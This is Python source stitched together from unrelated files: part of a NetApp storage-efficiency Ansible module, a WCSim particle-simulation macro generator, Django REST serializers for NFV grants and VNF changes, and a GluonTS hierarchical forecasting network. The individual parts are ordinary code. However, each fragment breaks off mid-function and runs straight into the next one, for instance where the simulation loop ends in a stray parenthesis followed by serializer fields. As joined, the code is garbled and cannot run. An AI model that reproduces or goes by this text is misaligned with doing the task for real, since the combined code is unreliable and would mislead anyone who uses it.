'vserver': self.parameters['vserver']
}
dummy, error = self.rest_api.patch(api, body, query)
if error:
self.module.fail_json(msg=error)
else:
sis_disable = netapp_utils.zapi.NaElement("sis-disable")
sis_disable.add_new_child("path", self.parameters['path'])
try:
self.server.invoke_successfully(sis_disable, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error disabling storage efficiency for path %s: %s' % (self.parameters['path'], to_native(error)),
exception=traceback.format_exc())
def modify_volume_efficiency(self):
"""
Modifies volume efficiency settings for a given volume by path
"""
if self.use_rest:
api = 'private/cli/volume/efficiency'
body = dict()
query = {
'path': self.parameters['path'],
'vserver': self.parameters['vserver']
}
if 'schedule' in self.parameters:
body['schedule'] = self.parameters['schedule']
if 'policy' in self.parameters:
body['policy'] = self.parameters['policy']
if 'enable_compression' in self.parameters:
body['compression'] = self.parameters['enable_compression']
if 'enable_inline_compression' in self.parameters:
body['inline_compression'] = self.parameters['enable_inline_compression']
if 'enable_inline_dedupe' in self.parameters:
body['inline_dedupe'] = self.parameters['enable_inline_dedupe']
if 'enable_data_compaction' in self.parameters:
body['data_compaction'] = self.parameters['enable_data_compaction']
if 'enable_cross_volume_inline_dedupe' in self.parameters:
body['cross_volume_inline_dedupe'] = self.parameters['enable_cross_volume_inline_dedupe']
if 'enable_cross_volume_background_dedupe' in self.parameters:
body['cross_volume_background_dedupe'] = self.parameters['enable_cross_volume_background_dedupe']
if 'storage_efficiency_mode' in self.parameters:
body['storage_efficiency_mode'] = self.parameters['storage_efficiency_mode']
dummy, error = self.rest_api.patch(api, body, query)
if error:
self.module.fail_json(msg='Error in volume/efficiency patch: %s' % error)
else:
sis_config_obj = netapp_utils.zapi.NaElement("sis-set-config")
sis_config_obj.add_new_child('path', self.parameters['path'])
if 'schedule' in self.parameters:
sis_config_obj.add_new_child('schedule', self.parameters['schedule'])
if 'policy' in self.parameters:
sis_config_obj.add_new_child('policy-name', self.parameters['policy'])
if 'enable_compression' in self.parameters:
sis_config_obj.add_new_child('enable-compression', self.na_helper.get_value_for_bool(False, self.parameters['enable_compression']))
if 'enable_inline_compression' in self.parameters:
import argparse
import subprocess
import random
import math
import os
class sWCSimGenerateData(object):
def __init__(self):
# Set parameters to choose.
#
parser = argparse.ArgumentParser(description="Generate several .root files of data for "
"different particles, energy, directions and initial positions "
"of the WCSim")
group = parser.add_argument_group()
group.add_argument("-l", "--levels", dest="levels", type=int, default=1,
help="Number of different levels of energy to simulate. "
"If levels=1, only needed the min energy.")
group.add_argument("-b", "--batch", dest="batch", type=int, default=1,
help="Batch of simulations with the same level of energy.")
group.add_argument("-v", "--events", dest="events", type=int, default=10,
help="Number of events per simulation.")
group.add_argument("-g", "--geometry", dest="geometry", type=str,
                           choices=['SuperK', 'SuperK_20inchPMT_20perCent',
'SuperK_20inchBandL_20perCent', 'nuPRISM',
                                    'SuperK_12inchBandL_15perCent',
'SuperK_20inchBandL_14perCent',
'HyperK',
'HyperKWithOD',
'HyperK_20perCent',
'Cylinder_60x74_20inchBandL_14perCent',
'Cylinder_60x74_20inchBandL_40perCent',
'Cylinder_12inchHPD_15perCent',
'EggShapedHyperK',
'EggShapedHyperK_withHPD'], default='SuperK',
help="Set geometry of the tank, default geometry: SuperK.")
group.add_argument("-q", "--particle", dest="particle", type=str, default="e-",
choices=["e-", "pi0", "mu-", "gamma"],
help="Particle to shoot from G4 Particle Gun.")
group.add_argument("-i", "--min_energy", dest="min_energy", type=float, default=100.0,
help="Set MIN energy of the range of simulations, in MeV")
group.add_argument("-a", "--max_energy", dest="max_energy", type=float, default=1000.0,
help="Set MAX energy of the range of simulations, in MeV")
parser.add_argument("-o", type=str, dest="output_file", default=None,
help="Output file name. Default: results/wcsim_output_<particle>_<energy>_<gen_id>.root")
parser.add_argument("-di", "--directory-destination", type=str,
dest="relative_dir_name", default="", help="Name of relative directory for output.")
parser.add_argument("-d", "--direction", dest="direction",
type=float, nargs=3, help="Initial direction of particle. Default: 1,0,0")
parser.add_argument("-p", "--position", dest="position",
type=float, nargs=3, help="Initial position of particle. Default: 0,0,0")
parser.add_argument("-rd", "--random_direction", dest="random_direction", action="store_true",
help="Generates random initial directions for particle.")
parser.add_argument("-rp", "--random_position", dest="random_position", action="store_true",
help="Generates random initial positions in the tank for the particle.")
parser.add_argument("-sd", "--swept_direction", dest="swept_direction", action="store_true",
help="Generates simulations in disctints angles ( in order ) in the plane xy.")
self._args = parser.parse_args()
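        # Illustrative invocation (the script filename below is assumed; the option
        # names are the ones defined above):
        #
        #   python3 generate_wcsim_data.py -l 5 -b 10 -v 100 -q e- -i 100 -a 1000 -g SuperK -rd
        #
        # would run 5 energy levels stepped from 100 MeV towards 1 GeV, 10
        # simulations per level, 100 events each, shooting electrons in random
        # directions inside a SuperK tank geometry.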
def get_str_energy(self, x):
if x < 0.001:
return "{} eV".format(round(x * 1000000, 4))
if x < 1:
return "{} keV".format(round(x * 1000, 4))
if x < 1000:
return "{} MeV".format(round(x, 4))
if x < 1000000:
return "{} GeV".format(round(x / 1000.0, 4))
else:
return "{} TeV".format(round(x / 1000000.0, 4))
def generate_macro(self, particle, energy, events, direction, position, output_dir_name,
output_file_name, geometry=None):
with open("WCSim.mac", "w") as macro:
macro.write("# Sample setup macro with no visualization. Generated with python3 script.\n")
macro.write("/run/verbose 1\n")
macro.write("/tracking/verbose 0\n")
macro.write("/hits/verbose 0\n\n")
macro.write("## select the geometry\n")
macro.write("# Default config if you do nothing is currently SuperK\n\n")
if geometry:
geometry_config = "/WCSim/WCgeom " + geometry + "\n"
macro.write(geometry_config)
else:
macro.write("/WCSim/WCgeom SuperK \n")
macro.write("# Select which PMT to use: \n")
macro.write("# /WCSim/nuPRISM/SetPMTType PMT8inch \n")
macro.write("# /WCSim/nuPRISM/SetPMTPercentCoverage 40 \n")
macro.write("# Set height of nuPRISM inner detector \n")
macro.write("# /WCSim/nuPRISM/SetDetectorHeight 6. m \n")
macro.write("# Set vertical position of inner detector, in beam coordinates\n")
macro.write("# /WCSim/nuPRISM/SetDetectorVerticalPosition 0. m\n")
macro.write("# Set diameter of inner detector\n")
macro.write("# /WCSim/nuPRISM/SetDetectorDiameter 8. m\n")
macro.write("\n# Set Gadolinium doping (concentration is in percent)\n")
macro.write("# /WCSim/DopingConcentration 0.1\n")
macro.write("# /WCSim/DopedWater false\n")
macro.write("# /WCSim/Construct\n")
macro.write("\n# Use mPMTs settings (uncomment/delete the above)\n")
macro.write("# /WCSim/WCgeom nuPRISM_mPMT\n")
macro.write("# /WCSim/WCgeom nuPRISMShort_mPMT\n")
macro.write("# Set Gadolinium doping (concentration is in percent)\n")
macro.write("# /WCSim/DopingConcentration 0.1\n")
macro.write("# /WCSim/DopedWater false\n")
macro.write("#/WCSim/Construct\n")
macro.write("## OR for single mPMT mode or updating mPMT parameters:\n")
macro.write("#/control/execute macros/mPMT_nuPrism1.mac\n")
macro.write("## mPMT options: mPMT_nuPrism1.mac and 2.mac\n")
macro.write("\n# Added for the PMT QE option 08/17/10 (XQ)\n")
macro.write("# 1. Stacking only mean when the photon is generated\n")
macro.write("# the QE is applied to reduce the total number of photons\n")
macro.write("# 2. Stacking and sensitivity detector\n")
macro.write("# In the stacking part, the maximum QE is applied to reduce\n")
macro.write("# the total number of photons\n")
macro.write("# On the detector side, the rest of QE are applied according to QE/QE_max\n")
macro.write("# distribution. This option is in particular important for the WLS\n")
macro.write("# 3. The third option means all the QE are applied at the detector\n")
macro.write("# Good for the low energy running.\n")
macro.write("# 4. Switch off the QE, ie. set it at 100%\n")
macro.write("/WCSim/PMTQEMethod Stacking_Only\n")
macro.write("#/WCSim/PMTQEMethod Stacking_And_SensitiveDetector\n")
macro.write("#/WCSim/PMTQEMethod SensitiveDetector_Only\n")
macro.write("#/WCSim/PMTQEMethod DoNotApplyQE\n")
macro.write("#turn on or off the collection efficiency\n")
macro.write("/WCSim/PMTCollEff on\n")
macro.write("# command to choose save or not save the pi0 info 07/03/10 (XQ)\n")
macro.write("/WCSim/SavePi0 false\n")
macro.write("#choose the Trigger & Digitizer type (and options)\n")
macro.write("/DAQ/Digitizer SKI\n")
macro.write("/DAQ/Trigger NDigits\n")
macro.write("#grab the other DAQ options (thresholds, timing windows, etc.)\n")
macro.write("/control/execute macros/daq.mac\n")
macro.write(
"\n# default dark noise frequency (and conversion factor) is PMT property (NEW), set in the code.\n")
macro.write("# Below gives possibility to overwrite nominal values, eg. to switch OFF the Dark Noise.\n")
macro.write("# /DarkRate/SetDarkRate 0 kHz #Turn dark noise off\n")
macro.write("/DarkRate/SetDarkRate 4.2 kHz # This is the value for SKI set in SKDETSIM.\n")
macro.write("# /DarkRate/SetDarkRate 8.4 kHz #For 20 inch HPDs and Box and Line PMTs,"
" based on High QE 20in R3600 dark rate from EGADS nov 2014\n")
macro.write("# /DarkRate/SetDarkRate 3.0 kHz #For 12 inch HPDs and Box and Line PMTs,"
" based on High QE 20in R3600 dark rate from EGADS nov 2014\n")
macro.write("\n# command to multiply the dark rate.\n")
macro.write("# Convert dark noise frequency before digitization "
"to after digitization by setting suitable factor\n")
macro.write("# Again, this is now a PMT property and can be overridden here\n")
macro.write("/DarkRate/SetConvert 1.367 # For Normal PMT\n")
macro.write("# /DarkRate/SetConvert 1.119 #For HPDs\n")
macro.write("# /DarkRate/SetConvert 1.126 #For Box and Line PMTs\n")
macro.write("\n# Select which time window(s) to add dark noise to\n")
macro.write("# /DarkRate/SetDarkMode 0 to add dark noise to a time window starting at\n")
macro.write("# /DarkRate/SetDarkLow to /DarkRate/SetDarkHigh [time in ns]\n")
macro.write("# /DarkRate/SetDarkMode 1 adds dark noise hits to a window of\n")
macro.write("# width /DarkRate/SetDarkWindow [time in ns] around each hit\n")
macro.write("# i.e. hit time +- (/DarkRate/SetDarkWindow) / 2\n")
macro.write("/DarkRate/SetDarkMode 1\n")
macro.write("/DarkRate/SetDarkHigh 100000\n")
macro.write("/DarkRate/SetDarkLow 0\n")
macro.write("/DarkRate/SetDarkWindow 4000\n")
macro.write("# Uncomment one of the lines below if you want to use the OGLSX or RayTracer visualizer\n")
macro.write("# /control/execute macros/visOGLSX.mac\n")
macro.write("# /control/execute macros/visRayTracer.mac\n")
macro.write("# /control/execute macros/visOGLQT.mac ## NEW\n")
macro.write("## select the input nuance-formatted vector file\n")
macro.write("## you can of course use your own\n")
macro.write("# /mygen/generator muline\n")
macro.write("# /mygen/vecfile inputvectorfile\n")
macro.write("# /mygen/vecfile h2o.2km.001-009x3_G4.kin\n")
macro.write("# /mygen/vecfile mu+.out\n")
macro.write("\n# Or you can use the G4 Particle Gun\n")
macro.write("# for a full list of /gun/ commands see:\n")
macro.write("# http://geant4.web.cern.ch/geant4/G4UsersDocuments/"
"UsersGuides/ForApplicationDeveloper/html/Control/UIcommands/_gun_.html\n")
macro.write("/mygen/generator gun\n")
macro.write(f"/gun/particle {particle}\n")
macro.write(f"/gun/energy {energy}\n")
macro.write(f"/gun/direction {direction[0]} {direction[1]} {direction[2]}\n")
macro.write(f"/gun/position {position[0]} {position[1]} {position[2]}\n")
macro.write("\n# Or you can use the G4 General Particle Source\n")
macro.write(
"# you can do a lot more with this than a monoenergetic, monodirectional, single-particle gun\n")
macro.write("# for a full list of /gps/ commands see:\n")
macro.write("# https://geant4.web.cern.ch/geant4/UserDocumentation/UsersGuides"
"/ForApplicationDeveloper/html/ch02s07.html\n")
macro.write("# /mygen/generator gps\n")
macro.write("# /gps/particle e-\n")
macro.write("# /gps/energy 500 MeV\n")
macro.write("# /gps/direction 1 0 0\n")
macro.write("# /gps/position 0 0 0\n")
macro.write("\n# Or you can use the laser option\n")
macro.write("# This is equivalent to the gps command, except that the "
"gps particle energies are saved ignoring their mass\n")
macro.write("# for a full list of /gps/ commands see:\n")
macro.write("# https://geant4.web.cern.ch/geant4/UserDocumentation/UsersGuides"
"/ForApplicationDeveloper/html/ch02s07.html\n")
macro.write("# It is used for laser calibration simulation\n")
macro.write("# /mygen/generator laser\n")
macro.write("# /gps/particle opticalphoton\n")
macro.write("# /gps/energy 2.505 eV\n")
macro.write("# /gps/direction 1 0 0\n")
macro.write("# /gps/position 0 0 0\n")
macro.write("# /gps/number 1000\n")
macro.write("# /gps/ang/type iso\n")
macro.write("# /gps/ang/mintheta 0 deg\n")
macro.write("# /gps/ang/maxtheta 30 deg\n")
macro.write("# /gps/ang/minphi 0 deg\n")
macro.write("# /gps/ang/maxphi 360 deg\n")
macro.write("\n##### NEW\n")
macro.write("/Tracking/fractionOpticalPhotonsToDraw 0.0\n")
macro.write(f"\n## change the name of the output root file, default = wcsim_output_<energy>"
"_<particle>_<gen_id>.root\n")
macro.write(f"/WCSimIO/RootFile {output_dir_name}/{output_file_name}\n")
macro.write("\n## Boolean to select whether to save the NEUT "
"RooTracker vertices in the output file, provided "
"you used\n")
macro.write("## a NEUT vector file as input\n")
macro.write("/WCSimIO/SaveRooTracker 0\n")
macro.write("\n## set a timer running on WCSimRunAction\n")
macro.write("# /WCSimIO/Timer false\n")
macro.write(f"/run/beamOn {events}\n")
macro.write("#exit\n")
def execute(self):
path = os.path.dirname(os.path.abspath(__file__))
output_dir_name = "./results" + self._args.relative_dir_name
os.makedirs(os.path.join(path, output_dir_name), exist_ok=True)
if self._args.direction:
direction = self._args.direction
else:
direction = [1, 0, 0]
if self._args.position:
position = self._args.position
else:
position = [0, 0, 0]
for levels in range(self._args.levels):
energyInMeV = (levels / self._args.levels) * (self._args.max_energy - self._args.min_energy) + \
self._args.min_energy
strEnergy = self.get_str_energy(energyInMeV)
            # Generate a random offset (starting angle) for the direction sweep
if self._args.swept_direction:
angle_offset = random.random() * 2 * math.pi
for batch in range(self._args.batch):
gen_id = str(batch) if batch >= 10 else "0{0}".format(batch)
if self._args.random_position:
px = 200 * random.random() - 100
py = 200 * random.random() - 100
pz = 200 * random.random() - 100
position = [px, py, pz]
if self._args.random_direction:
x = random.random()
)
subnetId = serializers.CharField(
help_text="Subnet defined by the identifier of the subnet resource in the VIM.",
required=False,
allow_null=True,
allow_blank=True
)
class IpOverEthernetAddressSerializer(serializers.Serializer):
macAddress = serializers.CharField(
help_text="MAC address.",
required=False,
allow_null=True,
allow_blank=True
)
ipAddresses = IpAddresseSerializer(
help_text="List of IP addresses to assign to the CP instance.",
many=True,
required=False
)
class CpProtocolDataConfigSerializer(serializers.Serializer):
layerProtocol = serializers.ChoiceField(
help_text="Identifier of layer(s) and protocol(s).",
choices=enum_to_list(LAYER_PROTOCOL),
required=True
)
ipOverEthernet = IpOverEthernetAddressSerializer(
help_text="Network address data for IP over Ethernet to assign to the extCP instance.",
required=False,
allow_null=True,
)
class VnfExtCpConfigDataSerializer(serializers.Serializer):
cpInstanceId = serializers.CharField(
help_text="Identifier of the external CP instance to which this set of configuration parameters is requested to be applied.",
required=False,
allow_null=True,
allow_blank=True
)
linkPortId = serializers.CharField(
help_text="Identifier of a pre-configured link port to which the external CP will be associated.",
required=False,
allow_null=True,
allow_blank=True
)
cpProtocolData = CpProtocolDataConfigSerializer(
help_text="Parameters for configuring the network protocols on the link port that connects the CP to a VL.",
many=True,
required=False
)
class VnfExtCpSerializer(serializers.Serializer):
cpdId = serializers.CharField(
help_text="The identifier of the CPD in the VNFD.",
required=True
)
cpConfig = VnfExtCpConfigDataSerializer(
help_text="List of instance data that need to be configured on the CP instances created from the respective CPD.",
many=True,
required=False
)
class ExtLinkPortSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of this link port as provided by the entity that has created the link port.",
required=True
)
resourceHandle = serializers.CharField(
help_text="Reference to the virtualised resource realizing this link port.",
required=True
)
class ExtVirtualLinkSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="The identifier of the external VL instance.",
required=True
)
vimConnectionId = serializers.CharField(
help_text="Identifier of the VIM connection to manage this resource.",
required=False,
allow_null=True,
allow_blank=True
)
resourceProviderId = serializers.CharField(
help_text="Identifies the entity responsible for the management of this resource.",
required=False,
allow_null=True,
allow_blank=True
)
resourceId = serializers.CharField(
help_text="The identifier of the resource in the scope of the VIM or the resource provider.",
required=True
)
extCps = VnfExtCpSerializer(
help_text="External CPs of the VNF to be connected to this external VL.",
many=True,
required=False
)
extLinkPorts = ExtLinkPortSerializer(
help_text="Externally provided link ports to be used to connect external connection points to this external VL.",
many=True,
required=False
)
class ExtManagedVirtualLinkSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="The identifier of the externally-managed internal VL instance.",
required=True
)
virtualLinkDescId = serializers.CharField(
help_text="The identifier of the VLD in the VNFD for this VL.",
required=True
)
vimConnectionId = serializers.CharField(
help_text="Identifier of the VIM connection to manage this resource.",
required=False,
allow_null=True,
allow_blank=True
)
resourceProviderId = serializers.CharField(
help_text="Identifies the entity responsible for the management of this resource.",
required=False,
allow_null=True,
allow_blank=True
)
resourceId = serializers.CharField(
help_text="The identifier of the resource in the scope of the VIM or the resource provider.",
required=True
)
class GrantLinksSerializer(serializers.Serializer):
self = LinkSerializer(
help_text="URI of this resource.",
required=True
)
vnfLcmOpOcc = LinkSerializer(
help_text="Related VNF lifecycle management operation occurrence.",
required=True
)
vnfInstance = LinkSerializer(
help_text="Related VNF instance.",
required=True
)
class GrantSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the grant.",
required=True
)
vnfInstanceId = serializers.CharField(
help_text="Identifier of the related VNF instance.",
required=True
)
vnfLcmOpOccId = serializers.CharField(
help_text="Identifier of the related VNF lifecycle management operation occurrence.",
required=False, # TODO required
allow_null=True,
allow_blank=True
)
vimConnections = VimConnectionInfoSerializer(
help_text="Provides information regarding VIM connections that are approved to be used by the VNFM to allocate resources.",
many=True,
required=False
)
zones = ZoneInfoSerializer(
help_text="Identifies resource zones where the resources are approved to be allocated by the VNFM.",
many=True,
required=False
)
zoneGroups = ZoneGroupInfoSerializer(
help_text="Information about groups of resource zones.",
many=True,
required=False
)
computeReservationId = serializers.CharField(
help_text="Information that identifies a reservation applicable to the compute resource requirements.",
required=False,
allow_null=True,
allow_blank=True
)
networkReservationId = serializers.CharField(
help_text="Information that identifies a reservation applicable to the network resource requirements.",
required=False,
allow_null=True,
allow_blank=True
)
storageReservationId = serializers.CharField(
help_text="Information that identifies a reservation applicable to the storage resource requirements.",
required=False,
allow_null=True,
allow_blank=True
)
addResources = GrantInfoSerializer(
help_text="List of resources that are approved to be added.",
many=True,
required=False
)
tempResources = GrantInfoSerializer(
help_text="List of resources that are approved to be temporarily instantiated during the runtime of the lifecycle operation.",
many=True,
required=False
)
removeResources = GrantInfoSerializer(
help_text="List of resources that are approved to be removed.",
many=True,
required=False
)
updateResources = GrantInfoSerializer(
help_text="List of resources that are approved to be modified.",
many=True,
required=False
)
vimAssets = VimAssetsSerializer(
help_text="Information about assets for the VNF that are managed by the NFVO in the VIM.",
required=False,
allow_null=True
)
extVirtualLinks = ExtVirtualLinkSerializer(
help_text="Information about external VLs to connect the VNF to.",
many=True,
required=False
)
extManagedVirtualLinks = ExtManagedVirtualLinkSerializer(
help_text="Information about internal VLs that are managed by other entities than the VNFM.",
many=True,
required=False
)
additionalParams = serializers.DictField(
help_text="Additional parameters passed by the NFVO, \
specific to the VNF and the LCM operation.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
_links = GrantLinksSerializer(
help_text="Links to resources related to this resource.",
required=False
)
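# Illustrative usage sketch (not part of this module): as with any DRF serializer,
# GrantSerializer can validate an incoming grant payload. The field names follow
# the definitions above; the payload values below are made up.
#
#   serializer = GrantSerializer(data={
#       'id': 'grant-001',
#       'vnfInstanceId': 'vnf-123',
#       'vnfLcmOpOccId': 'lcm-op-456',
#   })
#   if serializer.is_valid():
#       grant = serializer.validated_data
#   else:
#       errors = serializer.errors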
class AffectedVnfcSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the Vnfc instance.",
required=True
)
vduId = serializers.CharField(
help_text="Identifier of the related VDU in the VNFD.",
required=True
)
changeType = serializers.ChoiceField(
help_text="Signals the type of change.",
choices=enum_to_list(VNFC_CHANGE_TYPE),
required=True
)
computeResource = ResourceHandleSerializer(
help_text="Reference to the VirtualCompute resource.",
required=True
)
metadata = serializers.DictField(
help_text="Metadata about this resource.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
affectedVnfcCpIds = serializers.ListSerializer(
help_text="Identifiers of CP(s) of the VNFC instance that were affected by the change.",
child=serializers.CharField(help_text="Identifier In Vnf", allow_blank=True),
required=False,
allow_null=True
)
addedStorageResourceIds = serializers.ListSerializer(
help_text="References to VirtualStorage resources that have been added.",
child=serializers.CharField(help_text="Identifier In Vnf", allow_blank=True),
required=False,
allow_null=True
)
removedStorageResourceIds = serializers.ListSerializer(
help_text="References to VirtualStorage resources that have been removed.",
child=serializers.CharField(help_text="Identifier In Vnf", allow_blank=True),
required=False,
allow_null=True
)
class AffectedVirtualLinkSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the virtual link instance.",
required=True
)
virtualLinkDescId = serializers.CharField(
help_text="Identifier of the related VLD in the VNFD.",
required=True
)
changeType = serializers.ChoiceField(
help_text="Signals the type of change.",
choices=enum_to_list(VL_CHANGE_TYPE),
required=True
)
networkResource = ResourceHandleSerializer(
help_text="Reference to the VirtualNetwork resource.",
required=False,
allow_null=True
)
metadata = serializers.DictField(
help_text="Metadata about this resource.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
class AffectedVirtualStorageSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the storage instance.",
required=True
)
virtualStorageDescId = serializers.CharField(
help_text="Identifier of the related VirtualStorage descriptor in the VNFD.",
required=True
)
changeType = serializers.ChoiceField(
help_text="Signals the type of change.",
choices=enum_to_list(STORAGE_CHANGE_TYPE),
required=True
)
storageResource = ResourceHandleSerializer(
help_text="Reference to the VirtualStorage resource.",
required=False,
allow_null=True
)
metadata = serializers.DictField(
help_text="Metadata about this resource.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
class VnfInfoModificationsSerializer(serializers.Serializer):
vnfInstanceName = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfInstanceName attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfInstanceDescription = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfInstanceDescription attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfConfigurableProperties = serializers.DictField(
help_text="If present, this attribute signals modifications of the vnfConfigurableProperties attribute in VnfInstance.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
metadata = serializers.DictField(
help_text="If present, this attribute signals modifications of the metadata attribute in VnfInstance.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
extensions = serializers.DictField(
help_text="If present, this attribute signals modifications of the extensions attribute in VnfInstance.",
child=serializers.CharField(help_text="KeyValue Pairs", allow_blank=True),
required=False,
allow_null=True
)
vimConnectionInfo = VimConnectionInfoSerializer(
help_text="If present, this attribute signals modifications of the vimConnectionInfo attribute in VnfInstance.",
many=True,
required=False
)
vnfPkgId = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfPkgId attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfdId = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfdId attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfProvider = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfProvider attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfProductName = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfProductName attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfSoftwareVersion = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfSoftwareVersion attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
vnfdVersion = serializers.CharField(
help_text="If present, this attribute signals modifications of the vnfdVersion attribute in VnfInstance.",
required=False,
allow_null=True,
allow_blank=True
)
class ExtLinkPortInfoSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of this link port as provided by the entity that has created the link port.",
required=True
)
resourceHandle = ResourceHandleSerializer(
help_text="Reference to the virtualised resource realizing this link port.",
required=True
)
cpInstanceId = serializers.CharField(
help_text="Identifier of the external CP of the VNF connected to this link port.",
required=False,
allow_null=True,
allow_blank=True
)
# class ExtVirtualLinkInfoSerializer(serializers.Serializer):
# id = serializers.CharField(
# help_text="Identifier | |
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# Standard library imports
import warnings
from itertools import product
from typing import List, Tuple
# Third-party imports
import mxnet as mx
import numpy as np
# First-party imports
from gluonts.core.component import validated
from gluonts.mx import Tensor
from gluonts.mx.distribution import DistributionOutput
from gluonts.mx.util import assert_shape, weighted_average
from gluonts.mx.distribution import LowrankMultivariateGaussian
from gluonts.model.deepvar._network import DeepVARNetwork
class DeepHierNetwork(DeepVARNetwork):
@validated()
def __init__(
self,
M,
A,
num_layers: int,
num_cells: int,
cell_type: str,
history_length: int,
context_length: int,
prediction_length: int,
distr_output: DistributionOutput,
dropout_rate: float,
lags_seq: List[int],
target_dim: int,
conditioning_length: int,
cardinality: List[int] = [1],
embedding_dimension: int = 1,
scaling: bool = True,
seq_axis: List[int] = None,
**kwargs,
) -> None:
super().__init__(
num_layers=num_layers,
num_cells=num_cells,
cell_type=cell_type,
history_length=history_length,
context_length=context_length,
prediction_length=prediction_length,
distr_output=distr_output,
dropout_rate=dropout_rate,
lags_seq=lags_seq,
target_dim=target_dim,
conditioning_length=conditioning_length,
cardinality=cardinality,
embedding_dimension=embedding_dimension,
scaling=scaling,
**kwargs
)
self.M = M
self.A = A
self.seq_axis = seq_axis
def reconcile_samples(self, samples):
"""
Computes coherent samples by projecting unconstrained `samples` using the matrix `self.M`.
Parameters
----------
samples
Unconstrained samples.
Shape: (num_samples, batch_size, seq_len, num_ts) during training and
(num_parallel_samples x batch_size, seq_len, num_ts) during prediction.
Returns
-------
Coherent samples
Tensor, shape same as that of `samples`.
"""
if self.seq_axis:
            # move the axes to be iterated over to the front
samples = mx.nd.moveaxis(samples, self.seq_axis, list(range(len(self.seq_axis))))
out = [
mx.nd.dot(samples[idx], self.M, transpose_b=True)
for idx in product(*[range(x) for x in [samples.shape[d] for d in range(len(self.seq_axis))]])
]
            # restore the original axis order
out = mx.nd.concat(*out, dim=0).reshape(samples.shape)
out = mx.nd.moveaxis(out, list(range(len(self.seq_axis))), self.seq_axis)
return out
else:
return mx.nd.dot(samples, self.M, transpose_b=True)
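    # Illustrative sketch of the projection above (not part of the network). For a
    # toy hierarchy "total = bottom_1 + bottom_2" with summation matrix S, one
    # common choice is M = S (S^T S)^{-1} S^T, the least-squares projection onto
    # the coherent subspace (the actual M is supplied by the estimator, so this is
    # only an assumption made for intuition):
    #
    #   import numpy as np
    #   S = np.array([[1., 1.],
    #                 [1., 0.],
    #                 [0., 1.]])              # rows ordered [total, bottom_1, bottom_2]
    #   M = S @ np.linalg.inv(S.T @ S) @ S.T
    #   y = np.array([10., 4., 5.])           # incoherent: 4 + 5 != 10
    #   y_coherent = y @ M.T                  # same operation as mx.nd.dot(y, M, transpose_b=True)
    #   # y_coherent[0] is now (approximately) y_coherent[1] + y_coherent[2]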
def train_hybrid_forward(
self,
F,
target_dimension_indicator: Tensor,
past_time_feat: Tensor,
past_target_cdf: Tensor,
past_observed_values: Tensor,
past_is_pad: Tensor,
future_time_feat: Tensor,
future_target_cdf: Tensor,
future_observed_values: Tensor,
epoch_frac: float,
) -> Tuple[Tensor, ...]:
"""
Computes the loss for training DeepVAR, all inputs tensors representing
time series have NTC layout.
Parameters
----------
F
target_dimension_indicator
Indices of the target dimension (batch_size, target_dim)
past_time_feat
Dynamic features of past time series (batch_size, history_length,
num_features)
past_target_cdf
Past marginal CDF transformed target values (batch_size,
history_length, target_dim)
past_observed_values
Indicator whether or not the values were observed (batch_size,
history_length, target_dim)
past_is_pad
Indicator whether the past target values have been padded
(batch_size, history_length)
future_time_feat
Future time features (batch_size, prediction_length, num_features)
future_target_cdf
Future marginal CDF transformed target values (batch_size,
prediction_length, target_dim)
future_observed_values
Indicator whether or not the future values were observed
(batch_size, prediction_length, target_dim)
Returns
-------
distr
Loss with shape (batch_size, 1)
likelihoods
Likelihoods for each time step
(batch_size, context + prediction_length, 1)
distr_args
Distribution arguments (context + prediction_length,
number_of_arguments)
"""
seq_len = self.context_length + self.prediction_length
# unroll the decoder in "training mode", i.e. by providing future data
# as well
rnn_outputs, _, scale, lags_scaled, inputs = self.unroll_encoder(
F=F,
past_time_feat=past_time_feat,
past_target_cdf=past_target_cdf,
past_observed_values=past_observed_values,
past_is_pad=past_is_pad,
future_time_feat=future_time_feat,
future_target_cdf=future_target_cdf,
target_dimension_indicator=target_dimension_indicator,
)
# put together target sequence
# (batch_size, seq_len, target_dim)
target = F.concat(
past_target_cdf.slice_axis(
axis=1, begin=-self.context_length, end=None
),
future_target_cdf,
dim=1,
)
# assert_shape(target, (-1, seq_len, self.target_dim))
distr, distr_args = self.distr(
time_features=inputs,
rnn_outputs=rnn_outputs,
scale=scale,
lags_scaled=lags_scaled,
target_dimension_indicator=target_dimension_indicator,
